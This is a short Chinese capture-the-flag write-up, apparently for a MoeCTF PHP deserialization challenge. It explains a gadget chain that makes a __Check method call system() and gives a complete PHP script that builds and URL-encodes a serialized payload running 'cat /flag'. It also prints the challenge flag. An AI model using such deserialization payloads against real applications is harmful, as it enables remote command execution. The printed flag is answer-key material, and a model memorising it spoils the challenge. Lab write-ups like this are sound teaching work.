跳转至

Web-19|第十九章 星穹真相·补天归源

📖 阅读信息

阅读时间:1 分钟 | 中文字符:79 | 有效代码行数:20

碎碎念

反序列化 3.0

Writeup

更难的反序列化,需要构造调用链,阅读代码,关键在于 __Check 函数中的 $name($age); ,我们可以尝试构造 $namesystem 来执行系统命令,一步一步往上构造调用:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
class PersonA {
    public $name;
    public $id;
    public $age;
}
class PersonC {
    public $name;
    public $id;
    public $age;
}

$pc = new PersonC();
$pc->name = 'system';
$pc->age = "";
$pa = new PersonA();
$pa->name = $pc;
$pa->id = '__Check';
$pa->age = 'cat /flag';
echo urlencode(serialize($pa));
?>

传入参数 person 得到 flag:

最终 flag:moectf{4a7cdb12-80bf-5223-7501-ffe90c04a1cb}

💬 评论

评论系统加载中...